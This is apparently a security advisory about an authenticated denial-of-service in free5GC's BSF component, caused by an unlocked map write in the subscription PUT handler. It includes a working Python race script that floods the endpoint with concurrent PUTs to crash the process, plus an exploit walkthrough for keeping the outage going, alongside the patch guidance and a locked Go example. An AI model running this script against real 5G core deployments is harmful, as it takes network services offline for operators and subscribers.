free5GC BSF, Unsynchronized Map Access (DoS), (Medium)


The vulnerability (no official CVE yet, tracked as free5gc/free5gc#926) resides in free5GC's BSF component, in the handler for PUT /nbsf-management/v1/subscriptions/{subId}. The handler uses a global map, `BsfSelf.Subscriptions`, to store subscriptions. When processing a PUT request, it first calls `BSFContext.GetSubscription(subId)`, which acquires a read lock (`RLock()`) and reads the map. If the subscription does not exist, the code falls into a create-if-absent branch inside `ReplaceIndividualSubcription()`. In this branch, the map is written directly without acquiring any lock: `bsfContext.BsfSelf.Subscriptions[subId] = subscription`.

Under concurrent authenticated PUT requests with fresh `subId` values, one goroutine may be reading the map (holding the read lock) while another goroutine performs the unsafe write. The Go runtime detects this concurrent read/write on the same map and raises a fatal error: `fatal error: concurrent map read and map write`. This fatal error cannot be recovered by Gin's `recover()` middleware; it terminates the entire BSF process (exit code 2). The BSF container goes down, taking all nbsf-management SBI endpoints offline until a manual restart. The attack requires a valid OAuth2 token for the `nbsf-management` scope (PR:L), making it an authenticated denial-of-service (DoS) that can be repeated after every restart to sustain the outage.

Platform: free5gc BSF
Version: v4.2.1
Vulnerability: concurrent map read/write DoS
Severity: Medium
Date: 2026-03-22

Prediction: 2026-03-30 (patch merged in free5gc/bsf#7)

What Undercode Say:

Analytics

[bash]
# Check running BSF container
docker ps | grep bsf

# Monitor BSF logs for fatal error
docker logs -f bsf 2>&1 | grep -E "fatal error|concurrent map"

# Simulate concurrent PUT load (requires valid token)
cat > race_test.py << 'EOF'
import json, threading, urllib.request

TOKEN = "<valid_nbsf_management_jwt>"
BASE = "http://10.100.200.11:8000/nbsf-management/v1"
PAYLOAD = json.dumps({"events":["PCF_BINDING_CREATION"],"notifUri":"http://127.0.0.1/cb","notifCorreId":"1","supi":"imsi-208930000000003"}).encode()

def send_put(i, n):
    # One PUT with a fresh subId so the handler takes the create-if-absent branch
    url = f"{BASE}/subscriptions/race-mix-{i}-{n}"
    req = urllib.request.Request(url, data=PAYLOAD, method="PUT")
    req.add_header("Authorization", f"Bearer {TOKEN}")
    req.add_header("Content-Type", "application/json")
    urllib.request.urlopen(req, timeout=2).read()

threads = [threading.Thread(target=send_put, args=(i, n)) for i in range(64) for n in range(50)]
for t in threads: t.start()
for t in threads: t.join()
EOF
python3 race_test.py

# After crash, check container exit code
docker inspect bsf --format='{{.State.ExitCode}}'
[/bash]

Exploit:

The attacker obtains a valid `nbsf-management` token from the NRF (OAuth2 client credentials), then sends 64+ concurrent PUT requests to `/nbsf-management/v1/subscriptions/{fresh_subId}` with random subId values (e.g., race-mix-{i}-{n}). The concurrent unsynchronized read/write triggers the Go runtime fatal error, killing the BSF process. Repeating the requests after each restart maintains the DoS.

Protection from this CVE

Upgrade to a free5gc/bsf commit that includes the fix from PR 7 (which adds a lock before the unsafe write). Alternatively, apply the patch manually: replace the inline write `bsfContext.BsfSelf.Subscriptions[subId] = subscription` with a call to a locked helper like `CreateSubscription()`. As a temporary mitigation, rate-limit PUT requests on the `/nbsf-management/v1/subscriptions` endpoint or require manual review of high-concurrency sources.
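
The locked-helper pattern described above, as an added Go example (not free5GC's own code): `Store`, `Subscription` and `RunConcurrentPuts` are hypothetical names, and the `CreateSubscription` signature is an assumption. Reads take the read lock, and the create-if-absent write takes the write lock and re-checks existence there.

```go
package main

import (
	"fmt"
	"sync"
)

// Store and Subscription are simplified stand-ins (assumed names), not free5GC types.
type Subscription struct{ NotifURI string }

type Store struct {
	mu   sync.RWMutex
	subs map[string]*Subscription
}

// GetSubscription is the read path: the map is read under the read lock.
func (s *Store) GetSubscription(id string) (*Subscription, bool) {
	s.mu.RLock()
	defer s.mu.RUnlock()
	sub, ok := s.subs[id]
	return sub, ok
}

// CreateSubscription writes under the write lock (never a bare `s.subs[id] = sub`); true means newly created.
func (s *Store) CreateSubscription(id string, sub *Subscription) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	_, existed := s.subs[id] // re-check under the write lock: another PUT may have won
	s.subs[id] = sub
	return !existed
}

// RunConcurrentPuts replays read-then-create from n goroutines; returns entries stored.
func RunConcurrentPuts(n int) int {
	s := &Store{subs: make(map[string]*Subscription)}
	var wg sync.WaitGroup
	for i := 0; i < n; i++ {
		wg.Add(1)
		go func(i int) {
			defer wg.Done()
			id := fmt.Sprintf("sub-%d", i) // constructed sample ID
			if _, ok := s.GetSubscription(id); !ok {
				s.CreateSubscription(id, &Subscription{NotifURI: "http://127.0.0.1/cb"})
			}
		}(i)
	}
	wg.Wait()
	return len(s.subs)
}
func main() { fmt.Println(RunConcurrentPuts(3200)) }
```

Running a build with Go's race detector (`go run -race`) against a variant that writes the map without the lock reports the data race, which makes it a useful regression check in CI.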

Impact

Complete availability loss of BSF's nbsf-management SBI interface (PCF binding lookups, AF sessions). Attack requires only low-privileged authenticated access (nbsf-management token). No confidentiality or integrity impact. Entire BSF process exits, crashing the container (exit code 2). Service remains down until operator restarts the container; attacker can re-trigger immediately after restart, causing sustained DoS.


Sources:

Reported By: github.com